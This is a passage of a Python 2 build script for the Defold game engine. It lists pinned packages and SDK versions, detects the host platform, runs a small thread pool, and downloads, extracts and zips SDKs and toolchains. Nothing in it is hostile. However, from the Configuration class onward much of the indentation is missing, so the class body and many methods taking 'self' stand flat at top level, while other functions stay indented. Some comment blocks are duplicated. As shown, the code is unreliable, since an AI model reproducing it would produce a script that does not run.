PACKAGES_DARWIN_64="protobuf-2.3.0 PVRTexLib-4.18.0 webp-0.5.0 luajit-2.1.0-beta3 vpx-1.7.0 tremolo-0.0.8 sassc-5472db213ec223a67482df2226622be372921847 apkc-0.1.0 bullet-2.77 libunwind-395b27b68c5453222378bc5fe4dab4c6db89816a spirv-cross-2018-08-07 glslc-v2018.0 c-ares-1.16.1 MoltenVK-1.0.41".split()
PACKAGES_WIN32="webp-0.5.0 luajit-2.1.0-beta3 openal-1.1 glut-3.7.6 bullet-2.77 c-ares-1.16.1 vulkan-1.1.108".split()
PACKAGES_WIN32_64="PVRTexLib-4.18.0 webp-0.5.0 luajit-2.1.0-beta3 openal-1.1 glut-3.7.6 sassc-5472db213ec223a67482df2226622be372921847 apkc-0.1.0 bullet-2.77 spirv-cross-2018-08-07 glslc-v2018.0 c-ares-1.16.1 vulkan-1.1.108".split()
PACKAGES_LINUX_64="PVRTexLib-4.18.0 webp-0.5.0 luajit-2.1.0-beta3 sassc-5472db213ec223a67482df2226622be372921847 apkc-0.1.0 bullet-2.77 spirv-cross-2018-08-07 glslc-v2018.0 c-ares-1.16.1 vulkan-1.1.108".split()
PACKAGES_ANDROID="protobuf-2.3.0 android-support-multidex android-28 luajit-2.1.0-beta3 tremolo-0.0.8 bullet-2.77 libunwind-8ba86320a71bcdc7b411070c0c0f101cf2131cf2 c-ares-1.16.1".split()
PACKAGES_ANDROID_64="protobuf-2.3.0 android-support-multidex android-28 luajit-2.1.0-beta3 tremolo-0.0.8 bullet-2.77 libunwind-8ba86320a71bcdc7b411070c0c0f101cf2131cf2 c-ares-1.16.1".split()
PACKAGES_EMSCRIPTEN="protobuf-2.3.0 bullet-2.77".split()
PACKAGES_NODE_MODULES="xhr2-0.1.0".split()
DMSDK_PACKAGES_ALL="vectormathlibrary-r1649".split()
# Package download / upload locations.
CDN_PACKAGES_URL=os.environ.get("DM_PACKAGES_URL", None)
CDN_UPLOAD_URL="s3://d.defold.com/archive"
# Pinned SDK and toolchain versions.
PACKAGES_IOS_SDK="iPhoneOS14.0.sdk"
PACKAGES_IOS_SIMULATOR_SDK="iPhoneSimulator14.0.sdk"
PACKAGES_MACOS_SDK="MacOSX10.15.sdk"
PACKAGES_XCODE_TOOLCHAIN="XcodeDefault12.0.xctoolchain"
PACKAGES_TAPI_VERSION="tapi1.6"
WINDOWS_SDK_10_VERSION="10.0.18362.0"
WINDOWS_MSVC_2019_VERSION="14.25.28610"
PACKAGES_WIN32_TOOLCHAIN="Microsoft-Visual-Studio-2019-{0}".format(WINDOWS_MSVC_2019_VERSION)
PACKAGES_WIN32_SDK_10="WindowsKits-{0}".format(WINDOWS_SDK_10_VERSION)
PACKAGES_NODE_MODULE_XHR2="xhr2-v0.1.0"
PACKAGES_ANDROID_NDK="android-ndk-r20"
PACKAGES_ANDROID_SDK="android-sdk"
PACKAGES_LINUX_CLANG="clang-9.0.0"
PACKAGES_LINUX_TOOLCHAIN="clang+llvm-9.0.0-x86_64-linux-gnu-ubuntu-16.04"
PACKAGES_CCTOOLS_PORT="cctools-port-darwin19-6c438753d2252274678d3e0839270045698c159b-linux"
NODE_MODULE_LIB_DIR = os.path.join("ext", "lib", "node_modules")
EMSCRIPTEN_VERSION_STR = "1.39.16"
EMSCRIPTEN_SDK = "sdk-{0}-64bit".format(EMSCRIPTEN_VERSION_STR)
PACKAGES_EMSCRIPTEN_SDK="emsdk-{0}".format(EMSCRIPTEN_VERSION_STR)
SHELL = os.environ.get('SHELL', 'bash')
# Engine library names used by the build/clean steps.
ENGINE_LIBS = "testmain ddf particle glfw graphics lua hid input physics resource extension script render rig gameobject gui sound liveupdate crash gamesys tools record iap push iac webview profiler facebook engine sdk".split()
EXTERNAL_LIBS = "bullet3d".split()
def is_64bit_machine():
    """True when the machine's architecture name ends in '64'."""
    return platform.machine()[-2:] == '64'
# Legacy format, should be removed eventually
# Returns: [linux|x86_64-linux|win32|x86_64-win32|darwin]
# Legacy format, should be removed eventually
# Returns: [linux|x86_64-linux|win32|x86_64-win32|darwin]
def get_host_platform():
    """Return the legacy host platform identifier."""
    if sys.platform == 'linux2':
        # Python 2 reports 'linux2'; pick pointer width via architecture().
        return 'x86_64-linux' if platform.architecture()[0] == '64bit' else 'linux'
    if sys.platform == 'win32' and is_64bit_machine():
        return 'x86_64-win32'
    return sys.platform
# The difference from get_host_platform is that it returns the correct platform
# Returns: [x86|x86_64][win32|linux|darwin]
# The difference from get_host_platform is that it returns the correct platform
# Returns: [x86|x86_64][win32|linux|darwin]
def get_host_platform2():
    """Return the canonical <arch>-<os> host platform identifier."""
    if sys.platform == 'linux2':
        bits = platform.architecture()[0]
        return 'x86_64-linux' if bits == '64bit' else 'x86-linux'
    if sys.platform == 'win32':
        return 'x86_64-win32' if is_64bit_machine() else 'x86-win32'
    if sys.platform == 'darwin':
        return 'x86_64-darwin' if is_64bit_machine() else 'x86-darwin'
    raise Exception("Unknown host platform: %s" % sys.platform)
def format_exes(name, platform):
    """Return the executable file name(s) for `name` on `platform`.

    Web and Switch targets produce more than one artifact, hence a list.
    """
    prefix = ''
    suffixes = ['']
    if 'win32' in platform:
        suffixes = ['.exe']
    elif 'android' in platform:
        prefix = 'lib'
        suffixes = ['.so']
    elif 'js-web' in platform:
        suffixes = ['.js']
    elif 'wasm-web' in platform:
        suffixes = ['.js', '.wasm']
    elif platform in ['arm64-nx64']:
        suffixes = ['.nss', '.nso']
    return ['%s%s%s' % (prefix, name, suffix) for suffix in suffixes]
def format_lib(name, platform):
    """Return the shared-library file name for `name` on `platform`."""
    if 'darwin' in platform or 'ios' in platform:
        return 'lib%s.dylib' % name
    if 'win32' in platform:
        return '%s.dll' % name
    return 'lib%s.so' % name
class ThreadPool(object):
    """Fixed-size pool of daemon worker threads fed from a shared Queue.

    (Python 2 syntax — keep `except Exception,e` as-is.)
    """
    def __init__(self, worker_count):
        self.workers = []
        self.work_queue = Queue()
        for i in range(worker_count):
            w = Thread(target = self.worker)
            # Daemon threads so workers never keep the process alive.
            w.setDaemon(True)
            w.start()
            self.workers.append(w)

    def worker(self):
        # Each queue item is [func, args, future]; a falsy func stops the worker.
        func, args, future = self.work_queue.get()
        while func:
            try:
                result = func(*args)
                future.result = result
            except Exception,e:
                # Store the exception; Future.__call__ re-raises it in the caller.
                future.result = e
            future.event.set()
            func, args, future = self.work_queue.get()
class Future(object):
    """Result placeholder for a job submitted to ThreadPool.

    Calling the instance blocks until the worker finishes, then returns the
    result or re-raises the worker's exception. (Python 2 syntax.)
    """
    def __init__(self, pool, f, *args):
        self.result = None
        self.event = Event()
        pool.work_queue.put([f, args, self])

    def __call__(self):
        try:
            # In order to respond to ctrl+c wait with timeout...
            while not self.event.is_set():
                self.event.wait(0.1)
        except KeyboardInterrupt,e:
            sys.exit(0)

        # Re-raise failures from the worker thread in the caller's thread.
        if isinstance(self.result, Exception):
            raise self.result
        else:
            return self.result
def download_sdk(conf, url, targetfolder, strip_components=1, force_extract=False, format='z'):
    """Fetch (or reuse a cached copy of) an SDK archive and unpack it into
    `targetfolder`, stripping `strip_components` leading path elements.
    Skips the download when the folder already exists unless force_extract."""
    if not os.path.exists(targetfolder) or force_extract:
        if not os.path.exists(os.path.dirname(targetfolder)):
            os.makedirs(os.path.dirname(targetfolder))
        path = conf.get_local_or_remote_file(url)
        conf._extract_tgz_rename_folder(path, targetfolder, strip_components, format=format)
    else:
        print "SDK already installed:", targetfolder
class Configuration(object):
def __init__(self, dynamo_home = None,
target_platform = None,
skip_tests = False,
skip_codesign = False,
skip_docs = False,
skip_builtins = False,
skip_bob_light = False,
disable_ccache = False,
no_colors = False,
archive_path = None,
package_path = None,
set_version = None,
channel = None,
engine_artifacts = None,
waf_options = [],
save_env_path = None,
notarization_username = None,
notarization_password = None,
notarization_itc_provider = None,
github_token = None,
github_target_repo = None,
github_sha1 = None,
version = None,
codesigning_identity = None,
windows_cert = None,
windows_cert_pass = None):
if sys.platform == 'win32':
home = os.environ['USERPROFILE']
else:
home = os.environ['HOME']
self.dynamo_home = dynamo_home if dynamo_home else join(os.getcwd(), 'tmp', 'dynamo_home')
self.ext = join(self.dynamo_home, 'ext')
self.dmsdk = join(self.dynamo_home, 'sdk')
self.defold = normpath(join(dirname(abspath(__file__)), '..'))
self.defold_root = os.getcwd()
self.host = get_host_platform()
self.host2 = get_host_platform2()
self.target_platform = target_platform
self.build_utility = BuildUtility.BuildUtility(self.target_platform, self.host, self.dynamo_home)
self.skip_tests = skip_tests
self.skip_codesign = skip_codesign
self.skip_docs = skip_docs
self.skip_builtins = skip_builtins
self.skip_bob_light = skip_bob_light
self.disable_ccache = disable_ccache
self.no_colors = no_colors
self.archive_path = archive_path
self.package_path = package_path
self.set_version = set_version
self.channel = channel
self.engine_artifacts = engine_artifacts
self.waf_options = waf_options
self.save_env_path = save_env_path
self.notarization_username = notarization_username
self.notarization_password = notarization_password
self.notarization_itc_provider = notarization_itc_provider
self.github_token = github_token
self.github_target_repo = github_target_repo
self.github_sha1 = github_sha1
self.version = version
self.codesigning_identity = codesigning_identity
self.windows_cert = windows_cert
self.windows_cert_pass = windows_cert_pass
if self.github_token is None:
self.github_token = os.environ.get("GITHUB_TOKEN")
self.thread_pool = None
self.futures = []
if version is None:
with open('VERSION', 'r') as f:
self.version = f.readlines()[0].strip()
self._create_common_dirs()
def __del__(self):
if len(self.futures) > 0:
print('ERROR: Pending futures (%d)' % len(self.futures))
os._exit(5)
def _create_common_dirs(self):
for p in ['ext/lib/python', 'share', 'lib/js-web/js', 'lib/wasm-web/js']:
self._mkdirs(join(self.dynamo_home, p))
def _mkdirs(self, path):
if not os.path.exists(path):
os.makedirs(path)
def _log(self, msg):
print msg
sys.stdout.flush()
sys.stderr.flush()
def distclean(self):
if os.path.exists(self.dynamo_home):
self._log('Removing %s' % self.dynamo_home)
shutil.rmtree(self.dynamo_home)
for lib in ['dlib','texc']+ENGINE_LIBS:
builddir = join(self.defold_root, 'engine/%s/build' % lib)
if os.path.exists(builddir):
self._log('Removing %s' % builddir)
shutil.rmtree(builddir)
# Recreate dirs
self._create_common_dirs()
self._log('distclean done.')
def _extract_tgz(self, file, path):
self._log('Extracting %s to %s' % (file, path))
version = sys.version_info
suffix = os.path.splitext(file)[1]
# Avoid a bug in python 2.7 (fixed in 2.7.2) related to not being able to remove symlinks: http://bugs.python.org/issue10761
if self.host == 'x86_64-linux' and version[0] == 2 and version[1] == 7 and version[2] < 2:
fmts = {'.gz': 'z', '.xz': 'J', '.bzip2': 'j'}
run.env_command(self._form_env(), ['tar', 'xf%s' % fmts.get(suffix, 'z'), file], cwd = path)
else:
fmts = {'.gz': 'gz', '.xz': 'xz', '.bzip2': 'bz2'}
tf = TarFile.open(file, 'r:%s' % fmts.get(suffix, 'gz'))
tf.extractall(path)
tf.close()
def _extract_tgz_rename_folder(self, src, target_folder, strip_components=1, format=None):
src = src.replace('\\', '/')
force_local = ''
if os.environ.get('GITHUB_SHA', None) is not None and os.environ.get('TERM', '') == 'cygwin':
force_local = '--force-local' # to make tar not try to "connect" because it found a colon in the source file
self._log('Extracting %s to %s/' % (src, target_folder))
parentdir, dirname = os.path.split(target_folder)
old_dir = os.getcwd()
os.chdir(parentdir)
if not os.path.exists(dirname):
os.makedirs(dirname)
if format is None:
suffix = os.path.splitext(src)[1]
fmts = {'.gz': 'z', '.xz': 'J', '.bzip2': 'j'}
format = fmts.get(suffix, 'z')
cmd = ['tar', 'xf%s' % format, src, '-C', dirname]
if strip_components:
cmd.extend(['--strip-components', '%d' % strip_components])
if force_local:
cmd.append(force_local)
run.env_command(self._form_env(), cmd)
os.chdir(old_dir)
def _extract_zip(self, file, path):
self._log('Extracting %s to %s' % (file, path))
zf = zipfile.ZipFile(file, 'r')
zf.extractall(path)
zf.close()
def _extract(self, file, path):
if os.path.splitext(file)[1] == '.zip':
self._extract_zip(file, path)
else:
self._extract_tgz(file, path)
def _copy(self, src, dst):
self._log('Copying %s -> %s' % (src, dst))
shutil.copy(src, dst)
def _copy_tree(self, src, dst):
self._log('Copying %s -> %s' % (src, dst))
shutil.copytree(src, dst)
def _download(self, url):
    """Fetch *url* through the shared http cache, logging progress.

    Returns the local file path, or a falsy value when the download failed.
    """
    self._log('Downloading %s' % (url))
    def _report_progress(count, total):
        self._log('Downloading %s %.2f%%' % (url, 100 * count / float(total)))
    path = http_cache.download(url, _report_progress)
    if not path:
        self._log('Downloading %s failed' % (url))
    return path
def install_go(self):
    """Download and unpack the Go toolchain for the current target platform."""
    # Pinned go 1.7.1 distributions, keyed by target platform.
    urls = {
        'x86_64-darwin': 'https://storage.googleapis.com/golang/go1.7.1.darwin-amd64.tar.gz',
        'x86_64-linux' : 'https://storage.googleapis.com/golang/go1.7.1.linux-amd64.tar.gz',
        'win32'        : 'https://storage.googleapis.com/golang/go1.7.1.windows-386.zip',
        'x86_64-win32' : 'https://storage.googleapis.com/golang/go1.7.1.windows-amd64.zip'
    }
    url = urls.get(self.target_platform)
    if url:
        path = self._download(url)
        # Each platform gets its own subfolder under ext/go.
        target_path = join(self.ext, 'go', self.target_platform)
        self._extract(path, target_path)
    else:
        print("No go found for %s" % self.target_platform)
def _check_package_path(self):
if self.package_path is None:
print("No package path provided. Use either --package-path option or DM_PACKAGES_URL environment variable")
sys.exit(1)
def install_ext(self):
    """Unpack all prebuilt external packages needed for the current host and
    target platform into the ext/dmsdk folders, then install the SDKs.

    Packages are tracked in ``installed_packages`` so the same tarball is
    never extracted twice even when it appears for several platforms.
    """
    def make_package_path(root, platform, package):
        # <root>/packages/<package>-<platform>.tar.gz
        return join(root, 'packages', package) + '-%s.tar.gz' % platform
    def make_package_paths(root, platform, packages):
        return [make_package_path(root, platform, package) for package in packages]
    self._check_package_path()
    print("Installing common packages")
    for p in PACKAGES_ALL:
        self._extract_tgz(make_package_path(self.defold_root, 'common', p), self.ext)
    for p in DMSDK_PACKAGES_ALL:
        self._extract_tgz(make_package_path(self.defold_root, 'common', p), self.dmsdk)
    # TODO: Make sure the order of install does not affect the outcome!
    platform_packages = {
        'win32':          PACKAGES_WIN32,
        'x86_64-win32':   PACKAGES_WIN32_64,
        'x86_64-linux':   PACKAGES_LINUX_64,
        'darwin':         PACKAGES_DARWIN, # ?? Still used by bob-light?
        'x86_64-darwin':  PACKAGES_DARWIN_64,
        'armv7-darwin':   PACKAGES_IOS,
        'arm64-darwin':   PACKAGES_IOS_64,
        'x86_64-ios':     PACKAGES_IOS_X86_64,
        'armv7-android':  PACKAGES_ANDROID,
        'arm64-android':  PACKAGES_ANDROID_64,
        'js-web':         PACKAGES_EMSCRIPTEN,
        'wasm-web':       PACKAGES_EMSCRIPTEN
    }
    base_platforms = self.get_base_platforms()
    target_platform = self.target_platform
    # Platforms that are neither base, host nor target still get their
    # packages installed below (e.g. for cross-bundling support).
    other_platforms = set(platform_packages.keys()).difference(set(base_platforms), set([target_platform, self.host]))
    if target_platform in ['js-web', 'wasm-web']:
        # Emscripten targets additionally need the bundled node modules.
        node_modules_dir = os.path.join(self.dynamo_home, NODE_MODULE_LIB_DIR)
        for package in PACKAGES_NODE_MODULES:
            path = join(self.defold_root, 'packages', package + '.tar.gz')
            name = package.split('-')[0]
            self._extract_tgz(path, join(node_modules_dir, name))
    installed_packages = set()
    for platform in other_platforms:
        packages = platform_packages.get(platform, [])
        package_paths = make_package_paths(self.defold_root, platform, packages)
        print("Installing %s packages " % platform)
        for path in package_paths:
            self._extract_tgz(path, self.ext)
        installed_packages.update(package_paths)
    for base_platform in self.get_base_platforms():
        packages = list(PACKAGES_HOST) + build_private.get_install_host_packages(base_platform)
        packages.extend(platform_packages.get(base_platform, []))
        package_paths = make_package_paths(self.defold_root, base_platform, packages)
        # Skip tarballs already extracted for another platform group.
        package_paths = [path for path in package_paths if path not in installed_packages]
        if len(package_paths) != 0:
            print("Installing %s packages" % base_platform)
            for path in package_paths:
                self._extract_tgz(path, self.ext)
            installed_packages.update(package_paths)
    target_packages = platform_packages.get(self.target_platform, []) + build_private.get_install_target_packages(self.target_platform)
    target_package_paths = make_package_paths(self.defold_root, self.target_platform, target_packages)
    target_package_paths = [path for path in target_package_paths if path not in installed_packages]
    if len(target_package_paths) != 0:
        print("Installing %s packages" % self.target_platform)
        for path in target_package_paths:
            self._extract_tgz(path, self.ext)
        installed_packages.update(target_package_paths)
    print("Installing python eggs")
    run.env_command(self._form_env(), ['easy_install', '-q', '-d', join(self.ext, 'lib', 'python'), 'requests'])
    run.env_command(self._form_env(), ['easy_install', '-q', '-d', join(self.ext, 'lib', 'python'), 'pyaml'])
    for egg in glob(join(self.defold_root, 'packages', '*.egg')):
        self._log('Installing %s' % basename(egg))
        run.env_command(self._form_env(), ['python', '-m', 'easy_install', '-q', '-d', join(self.ext, 'lib', 'python'), '-N', egg])
    print("Installing javascripts")
    for n in 'js-web-pre.js'.split():
        self._copy(join(self.defold_root, 'share', n), join(self.dynamo_home, 'share'))
    for n in 'js-web-pre-engine.js'.split():
        self._copy(join(self.defold_root, 'share', n), join(self.dynamo_home, 'share'))
    print("Installing profiles etc")
    for n in itertools.chain(*[ glob('share/*%s' % ext) for ext in ['.mobileprovision', '.xcent', '.supp']]):
        self._copy(join(self.defold_root, n), join(self.dynamo_home, 'share'))
    # Simple way to reduce number of warnings in the build
    proto_path = os.path.join(self.dynamo_home, 'share', 'proto')
    if not os.path.exists(proto_path):
        os.makedirs(proto_path)
    # Note: This is a step we want to separate from install_ext
    # since it should actually be before install_ext (e.g. to build the extensions)
    self.install_sdk()
def get_local_or_remote_file(self, path):
if os.path.isdir(self.package_path): # is is a local path?
if os.path.exists(path):
return os.path.normpath(os.path.abspath(path))
print "Could not find local file:", path
sys.exit(1)
dirname, basename = os.path.split(path)
path = dirname + "/" + urllib.quote(basename)
path = self._download(path) # it should be an url
if path is None:
print("Error. Could not download %s" % path)
sys.exit(1)
return path
def check_sdk(self):
    """Verify that the SDK folders required by the target platform exist
    under ext/SDKs; exits with code 1 and a hint if any is missing."""
    sdkfolder = join(self.ext, 'SDKs')
    folders = []
    # macOS/iOS targets need the macOS SDK + Xcode toolchain.
    if self.target_platform in ('x86_64-darwin', 'armv7-darwin', 'arm64-darwin', 'x86_64-ios'):
        folders.append(join(sdkfolder, PACKAGES_MACOS_SDK))
        folders.append(join(sdkfolder, PACKAGES_XCODE_TOOLCHAIN))
    # iOS targets additionally need the device and simulator SDKs.
    if self.target_platform in ('armv7-darwin', 'arm64-darwin', 'x86_64-ios'):
        folders.append(join(sdkfolder, PACKAGES_IOS_SDK))
        folders.append(join(sdkfolder, PACKAGES_IOS_SIMULATOR_SDK))
    # Windows targets need the Windows Kits + MSVC toolchain.
    if self.target_platform in ('x86_64-win32', 'win32'):
        folders.append(join(sdkfolder, 'Win32','WindowsKits','10'))
        folders.append(join(sdkfolder, 'Win32','MicrosoftVisualStudio14.0','VC'))
    # Android targets need the NDK and SDK.
    if self.target_platform in ('armv7-android', 'arm64-android'):
        folders.append(join(sdkfolder, PACKAGES_ANDROID_NDK))
        folders.append(join(sdkfolder, PACKAGES_ANDROID_SDK))
    for f in folders:
        if not os.path.exists(f):
            print "Missing SDK in", f
            print "Run './scripts/build.py install_ext --platform=%s'" % self.target_platform
            sys.exit(1)
def install_sdk(self):
    """Download and unpack the platform SDKs/toolchains required for the
    current target platform (and host) into ext/SDKs."""
    sdkfolder = join(self.ext, 'SDKs')
    target_platform = self.target_platform
    if target_platform in ('x86_64-darwin', 'armv7-darwin', 'arm64-darwin', 'x86_64-ios'):
        # macOS SDK
        download_sdk(self,'%s/%s.tar.gz' % (self.package_path, PACKAGES_MACOS_SDK), join(sdkfolder, PACKAGES_MACOS_SDK))
        download_sdk(self,'%s/%s.tar.gz' % (self.package_path, PACKAGES_XCODE_TOOLCHAIN), join(sdkfolder, PACKAGES_XCODE_TOOLCHAIN))
    if target_platform in ('armv7-darwin', 'arm64-darwin', 'x86_64-ios'):
        # iOS SDK
        download_sdk(self,'%s/%s.tar.gz' % (self.package_path, PACKAGES_IOS_SDK), join(sdkfolder, PACKAGES_IOS_SDK))
        download_sdk(self,'%s/%s.tar.gz' % (self.package_path, PACKAGES_IOS_SIMULATOR_SDK), join(sdkfolder, PACKAGES_IOS_SIMULATOR_SDK))
    # Windows SDKs are needed both when targeting win32 and when building on it.
    if 'win32' in target_platform or ('win32' in self.host2):
        win32_sdk_folder = join(self.ext, 'SDKs', 'Win32')
        download_sdk(self,'%s/%s.tar.gz' % (self.package_path, PACKAGES_WIN32_SDK_10), join(win32_sdk_folder, 'WindowsKits', '10') )
        download_sdk(self,'%s/%s.tar.gz' % (self.package_path, PACKAGES_WIN32_TOOLCHAIN), join(win32_sdk_folder, 'MicrosoftVisualStudio14.0'), strip_components=0 )
        # On OSX, the file system is already case insensitive, so no need to duplicate the files as we do on the extender server
    if target_platform in ('armv7-android', 'arm64-android'):
        host = self.host
        # Normalize host name to the suffix used by the NDK/SDK package names.
        if 'win32' in host:
            host = 'windows'
        elif 'linux' in host:
            host = 'linux'
        # Android NDK
        download_sdk(self, '%s/%s-%s-x86_64.tar.gz' % (self.package_path, PACKAGES_ANDROID_NDK, host), join(sdkfolder, PACKAGES_ANDROID_NDK))
        # Android SDK
        download_sdk(self, '%s/%s-%s-android-29-29.0.3.tar.gz' % (self.package_path, PACKAGES_ANDROID_SDK, host), join(sdkfolder, PACKAGES_ANDROID_SDK))
    if 'linux' in self.host2:
        # Clang toolchain used for all builds on linux hosts (xz compressed).
        download_sdk(self, '%s/%s.tar.xz' % (self.package_path, PACKAGES_LINUX_TOOLCHAIN), join(sdkfolder, 'linux', PACKAGES_LINUX_CLANG), format='J')
    if target_platform in ('x86_64-darwin', 'armv7-darwin', 'arm64-darwin', 'x86_64-ios') and 'linux' in self.host2:
        # cctools-port provides the Apple linker tools for cross builds from linux.
        if not os.path.exists(join(sdkfolder, 'linux', PACKAGES_LINUX_CLANG, 'cctools')):
            download_sdk(self, '%s/%s.tar.gz' % (self.package_path, PACKAGES_CCTOOLS_PORT), join(sdkfolder, 'linux', PACKAGES_LINUX_CLANG), force_extract=True)
    build_private.install_sdk(self, target_platform)
def get_ems_dir(self):
    """Return the emsdk install directory for the pinned Emscripten version."""
    return join(self.ext, 'SDKs', 'emsdk-%s' % EMSCRIPTEN_VERSION_STR)
def _form_ems_path(self):
    """Return the emscripten tools dir, preferring the upstream backend and
    falling back to fastcomp when upstream is not installed."""
    upstream_path = join(self.get_ems_dir(), 'upstream', 'emscripten')
    fastcomp_path = join(self.get_ems_dir(), 'fastcomp', 'emscripten')
    return upstream_path if os.path.exists(upstream_path) else fastcomp_path
def install_ems(self):
    """Install the Emscripten SDK (if not present) and point the EM_*
    environment variables at it; activates it when no config exists yet."""
    # TODO: should eventually be moved to install_sdk
    emsDir = self.get_ems_dir()
    os.environ['EMSCRIPTEN'] = self._form_ems_path()
    os.environ['EM_CONFIG'] = join(self.get_ems_dir(), '.emscripten')
    os.environ['EM_CACHE'] = join(self.get_ems_dir(), 'emscripten_cache')
    if os.path.isdir(emsDir):
        print "Emscripten is already installed:", emsDir
    else:
        self._check_package_path()
        # Map host platform names to the suffix used in the sdk package name.
        platform_map = {'x86_64-linux':'linux','x86_64-darwin':'darwin','x86_64-win32':'win32'}
        path = join(self.package_path, '%s-%s.tar.gz' % (PACKAGES_EMSCRIPTEN_SDK, platform_map.get(self.host, self.host)))
        path = self.get_local_or_remote_file(path)
        self._extract(path, join(self.ext, 'SDKs'))
    config = os.environ['EM_CONFIG']
    if not os.path.isfile(config):
        # First install: run 'emsdk activate' and prewarm the caches.
        self.activate_ems()
def activate_ems(self):
    """Run 'emsdk activate' for the pinned version and prewarm the
    emscripten system-library cache by compiling a trivial program."""
    version = EMSCRIPTEN_VERSION_STR
    if 'fastcomp' in self._form_ems_path():
        version += "-fastcomp"
    run.env_command(self._form_env(), [join(self.get_ems_dir(), 'emsdk'), 'activate', version, '--embedded'])
    # prewarm the cache
    # Although this method might be more "correct", it also takes 10 minutes more than we'd like on CI
    #run.env_command(self._form_env(), ['%s/embuilder.py' % self._form_ems_path(), 'build', 'SYSTEM', 'MINIMAL'])
    # .. so we stick with the old version of prewarming
    # Compile a file warm up the emscripten caches (libc etc)
    # NOTE(review): tempfile.mktemp is race-prone; acceptable here since the
    # files are private scratch paths on a CI machine.
    c_file = tempfile.mktemp(suffix='.c')
    exe_file = tempfile.mktemp(suffix='.js')
    with open(c_file, 'w') as f:
        f.write('int main() { return 0; }')
    run.env_command(self._form_env(), ['%s/emcc' % self._form_ems_path(), c_file, '-o', '%s' % exe_file])
def check_ems(self):
    """Print diagnostics when the Emscripten config or tools are missing;
    purely informational, never raises or exits."""
    home = os.path.expanduser('~')
    config = join(home, '.emscripten')
    err = False
    if not os.path.isfile(config):
        print 'No .emscripten file.'
        err = True
    emsDir = self.get_ems_dir()
    if not os.path.isdir(emsDir):
        print 'Emscripten tools not installed.'
        err = True
    if err:
        print 'Consider running install_ems'
def _git_sha1(self, ref = None):
    """Return the git sha1 for *ref* (HEAD when ref is None); delegates to
    the shared build utility."""
    return self.build_utility.git_sha1(ref)
def _ziptree(self, path, outfile = None, directory = None):
# Directory is similar to -C in tar
if not outfile:
outfile = tempfile.NamedTemporaryFile(delete = False)
zip = zipfile.ZipFile(outfile, 'w', zipfile.ZIP_DEFLATED)
for root, dirs, files in os.walk(path):
for f in files:
p = os.path.join(root, f)
an = p
if directory:
an = os.path.relpath(p, directory)
zip.write(p, an)
zip.close()
return outfile.name
def _add_files_to_zip(self, zip, paths, directory=None, topfolder=None):
for p in paths:
if not os.path.isfile(p):
continue
an = p
if directory:
an = os.path.relpath(p, directory)
if topfolder:
an = os.path.join(topfolder, an)
zip.write(p, an)
def is_cross_platform(self):
    """True when the build target differs from the host platform."""
    host, target = self.host, self.target_platform
    return host != target
def is_desktop_target(self):
    """True when targeting one of the 64-bit desktop platforms."""
    desktop_platforms = ('x86_64-linux', 'x86_64-darwin', 'x86_64-win32')
    return self.target_platform in desktop_platforms
# package the native SDK, return the path to the zip file
def _package_platform_sdk(self, platform):
    """Package the native defold SDK for *platform* into
    <dynamo_home>/defoldsdk.zip and return that path."""
    with open(join(self.dynamo_home, 'defoldsdk.zip'), 'wb') as outfile:
        zip = zipfile.ZipFile(outfile, 'w', zipfile.ZIP_DEFLATED)
        topfolder = 'defoldsdk'
        defold_home = os.path.normpath(os.path.join(self.dynamo_home, '..', '..'))
        # Includes
        includes = []
        cwd = os.getcwd()
        # chdir so os.walk yields paths relative to dynamo_home.
        os.chdir(self.dynamo_home)
        for root, dirs, files in os.walk("sdk/include"):
            for file in files:
                if file.endswith('.h'):
                    includes.append(os.path.join(root, file))
        os.chdir(cwd)
        includes = [os.path.join(self.dynamo_home, x) for x in includes]
        self._add_files_to_zip(zip, includes, os.path.join(self.dynamo_home, 'sdk'), topfolder)
        # Configs
        configs = ['extender/build.yml']
        configs = [os.path.join(self.dynamo_home, x) for x in configs]
        self._add_files_to_zip(zip, configs, self.dynamo_home, topfolder)
        # Variants
        variants = []
        cwd = os.getcwd()
        os.chdir(self.dynamo_home)
        for root, dirs, files in os.walk("extender/variants"):
            for file in files:
                if file.endswith('.appmanifest'):
                    variants.append(os.path.join(root, file))
        os.chdir(cwd)
        variants = [os.path.join(self.dynamo_home, x) for x in variants]
        self._add_files_to_zip(zip, variants, self.dynamo_home, topfolder)
        # Helpers filtering a directory listing down to the interesting files.
        def _findlibs(libdir):
            paths = os.listdir(libdir)
            paths = [os.path.join(libdir, x) for x in paths if os.path.splitext(x)[1] in ('.a', '.dylib', '.so', '.lib', '.dll')]
            return paths
        def _findjars(jardir, ends_with):
            paths = os.listdir(jardir)
            paths = [os.path.join(jardir, x) for x in paths if x.endswith(ends_with)]
            return paths
        def _findjslibs(libdir):
            paths = os.listdir(libdir)
            paths = [os.path.join(libdir, x) for x in paths if os.path.splitext(x)[1] in ('.js',)]
            return paths
        # Dynamo libs
        libdir = os.path.join(self.dynamo_home, 'lib/%s' % platform)
        paths = _findlibs(libdir)
        self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder)
        # External libs
        libdir = os.path.join(self.dynamo_home, 'ext/lib/%s' % platform)
        paths = _findlibs(libdir)
        self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder)
        # Android Jars (Dynamo)
        jardir = os.path.join(self.dynamo_home, 'share/java')
        paths = _findjars(jardir, ('android.jar', 'dlib.jar', 'r.jar'))
        self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder)
        # Android Jars (external)
        external_jars = ("android-support-multidex.jar",
                         "android.jar")
        jardir = os.path.join(self.dynamo_home, 'ext/share/java')
        paths = _findjars(jardir, external_jars)
        self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder)
        # Win32 resource files
        # NOTE(review): the variable names look swapped (engine_rc holds the
        # .ico path and defold_ico the .rc path) but both files are added to
        # the zip, so behavior is unaffected.
        engine_rc = os.path.join(self.dynamo_home, 'lib/%s/defold.ico' % platform)
        defold_ico = os.path.join(self.dynamo_home, 'lib/%s/engine.rc' % platform)
        self._add_files_to_zip(zip, [engine_rc, defold_ico], self.dynamo_home, topfolder)
        # JavaScript files
        # js-web-pre-x files
        jsdir = os.path.join(self.dynamo_home, 'share')
        paths = _findjslibs(jsdir)
        self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder)
        # libraries for js-web
        jsdir = os.path.join(self.dynamo_home, 'lib/js-web/js/')
        paths = _findjslibs(jsdir)
        self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder)
        # libraries for wasm-web
        jsdir = os.path.join(self.dynamo_home, 'lib/wasm-web/js/')
        paths = _findjslibs(jsdir)
        self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder)
